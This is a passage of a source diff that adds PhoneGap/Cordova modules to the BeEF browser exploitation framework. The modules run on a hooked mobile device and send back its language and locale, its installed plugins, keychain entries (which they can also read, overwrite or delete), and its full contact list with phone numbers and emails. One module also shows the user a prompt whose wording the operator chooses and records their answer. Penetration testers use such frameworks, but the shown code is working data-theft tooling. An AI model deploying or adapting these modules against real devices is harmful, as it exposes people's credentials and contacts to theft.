         phonegap_details = "unable to detect phonegap";
     }

modules/phonegap/phonegap_globalization_status/command.js

@@ -0,0 +1,34 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_globalization_status
+//
+beef.execute(function() {
+    var result = '';
+
+    navigator.globalization.getPreferredLanguage(
+  		function (language) {
+  			result = 'language: ' + language.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}, 
+  		function () {
+  			result = 'language: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+
+    navigator.globalization.getLocaleName(
+  		function (locale) {
+  			result = 'locale: ' + locale.value + '\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		},
+  		function () {
+  			result = 'locale: ' + 'fail\n';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );
+  		}
+	);
+    
+});

modules/phonegap/phonegap_globalization_status/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_globalization_status
+#
+beef:
+    module:
+        phonegap_globalization_status:
+            enable: true
+            category: "Phonegap"
+            name: "Globalization Status"
+            description: "Examine device local settings"
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_globalization_status/module.rb

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // Phonegap_globalization_status
+
+class Phonegap_globalization_status < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

modules/phonegap/phonegap_keychain/command.js

@@ -0,0 +1,82 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_keychain
+//
+beef.execute(function() {
+    var servicename = "<%== @servicename %>";
+    var key = "<%== @key %>";
+    var value = "<%== @value %>";
+    var action = "<%== @action %>";
+    var result = '';
+    var kc = '';
+
+    try {
+        kc = cordova.require("cordova/plugin/keychain");
+    } catch (err) {
+        result = 'Unable to access keychain plugin';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    }
+
+    function onGet()
+    {  
+        var win = function(value) {
+            result = result + "GET SUCCESS - Key: " + key + " Value: " + value;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+
+        };
+        var fail = function(error) {
+            result = result + "GET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.getForKey(win, fail, key, servicename);
+
+    }
+    
+    function onSet()
+    {        
+        var win = function() {
+            result = result + "SET SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "SET FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.setForKey(win, fail, key, servicename, value);
+    }
+    
+    function onRemove()
+    {
+        var win = function() {
+            result = result + "REMOVE SUCCESS - Key: " + key;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        var fail = function(error) {
+            result = result + "REMOVE FAIL - Key: " + key + " Error: " + error;
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+        };
+        
+        kc.removeForKey(win, fail, key, servicename);
+    }
+
+    if (kc !== undefined)  {
+        switch(action) {
+            case 'Read':
+                onGet();
+                break;
+            case 'CreateUpdate':
+                onSet();
+                break;
+            case 'Delete':
+                onRemove();
+                break;
+        }
+    } 
+
+});

modules/phonegap/phonegap_keychain/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   Phonegap_keychain
+#
+beef:
+    module:
+        phonegap_keychain:
+            enable: true
+            category: "Phonegap"
+            name: "Keychain"
+            description: "Read/CreateUpdate/Delete Keychain Elements"
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_keychain/module.rb

@@ -0,0 +1,53 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# Phonegap_keychain
+#
+
+class Phonegap_keychain < BeEF::Core::Command
+  
+    def self.options
+        return [{
+            'name' => 'servicename', 
+            'description' => 'Service name', 
+            'ui_label'=>'Service name', 
+            'value' => 'ServiceNameTest',
+            'width' => '300px'
+            
+            },{
+            'name' => 'key', 
+            'description' => 'Key', 
+            'ui_label'=>'Key', 
+            'value' => 'TestKey',
+            'width' => '300px'
+            },{
+            'name' => 'value', 
+            'description' => 'Value', 
+            'ui_label'=>'Value', 
+            'value' => 'TestValue',
+            'width' => '100px'
+            },{
+            'name' => 'action', 
+            'type' => 'combobox',
+            'ui_label' => 'Action Type',
+            'store_type' => 'arraystore', 
+            'store_fields' => ['action'], 
+            'store_data' => [['Read'],['CreateUpdate'],['Delete']], 
+            'valueField' => 'action', 
+            'value' => 'CreateUpdate', 
+            editable: false, 
+            'displayField' => 'action', 
+            'mode' => 'local', 
+            'autoWidth' => true 
+          }]
+  end
+
+  def callback
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+
+end

modules/phonegap/phonegap_list_contacts/command.js

@@ -0,0 +1,43 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// phonegap_list_contacts
+//
+beef.execute(function() {
+    var result = '';
+
+    function onSuccess(contacts) {
+
+         for (var i=0; i<contacts.length; i++) {
+            result = contacts[i].displayName;
+            
+            for (var j=0; j<contacts[i].phoneNumbers.length; j++) {
+                result = result + ' #:' + contacts[i].phoneNumbers[j].value;
+            }
+
+            for (var j=0; j<contacts[i].emails.length; j++) {
+                result = result + ' @:' + contacts[i].emails[j].value;
+            }
+
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+
+        }
+    };
+
+    function onError(contactError) {
+        result = 'fail';
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+    };
+
+
+    var options = new ContactFindOptions();
+    options.filter="";
+    options.multiple=true; 
+    var fields = ["displayName", "phoneNumbers", "emails"];
+    
+    navigator.contacts.find(fields, onSuccess, onError, options);
+    
+});

modules/phonegap/phonegap_list_contacts/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   phonegap
+#
+beef:
+    module:
+        phonegap_list_contacts:
+            enable: true
+            category: "Phonegap"
+            name: "List Contacts"
+            description: "Examine device contacts."
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_list_contacts/module.rb

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // phonegap_list_contacts
+
+class Phonegap_list_contacts < BeEF::Core::Command
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

modules/phonegap/phonegap_plugin_detection/command.js

@@ -0,0 +1,49 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// phonegap_plugin_detection
+//
+beef.execute(function() {
+    var result = '';
+
+    // Approximate list of plugins, intended to work with Cordova 2.x
+    var plugins = new Array(
+        "cordova/plugin/device",
+        "cordova/plugin/logger",
+        "cordova/plugin/compass",
+        "cordova/plugin/accelerometer",
+        "cordova/plugin/Camera",
+        "cordova/plugin/network",
+        "cordova/plugin/contacts",
+        "cordova/plugin/echo",
+        "cordova/plugin/File",
+        "cordova/plugin/FileTransfer",
+        "cordova/plugin/geolocation",
+        "cordova/plugin/notification",
+        "cordova/plugin/Media",
+        "cordova/plugin/capture",
+        "cordova/plugin/splashscreen",
+        "cordova/plugin/battery",
+        "cordova/plugin/globalization",
+        "cordova/plugin/InAppBrowser",
+        "cordova/plugin/keychain"
+    );
+
+    for (var i=0; i<plugins.length; i++) {
+        try {
+            var a = cordova.require(plugins[i]);
+            if (a !== undefined) {
+                result = result + '\n plugin: ' + plugins[i];
+            }
+        } catch (err) {
+            // do nothing
+        }
+    }
+
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result ); 
+   
+});

modules/phonegap/phonegap_plugin_detection/config.yaml

@@ -0,0 +1,17 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+#   phonegap_plugin_detection
+#
+beef:
+    module:
+        phonegap_plugin_detection:
+            enable: true
+            category: "Phonegap"
+            name: "List Plugins"
+            description: "Attempts to guess installed plugins."
+            authors: ["staregate"]
+            target:
+                working: ["All"]

modules/phonegap/phonegap_plugin_detection/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+# // phonegap_plugin_detection
+
+class Phonegap_plugin_detection < BeEF::Core::Command
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end 
+end

modules/phonegap/phonegap_prompt_user/command.js

@@ -0,0 +1,29 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Phonegap_prompt_user
+//
+beef.execute(function() {
+    var title = "<%== @title %>";
+    var question = "<%== @question %>";
+    var ans_yes = "<%== @ans_yes %>";
+    var ans_no = "<%== @ans_no %>";
+    var result = '';
+
+   
+    function onPrompt(results) {
+        result = "Selected button number " + results.buttonIndex + " result: " + results.input1;
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );    
+    }
+
+    navigator.notification.prompt(
+        question,
+        onPrompt,      
+        title,         
+        [ans_yes,ans_no]
+    );
+  
+});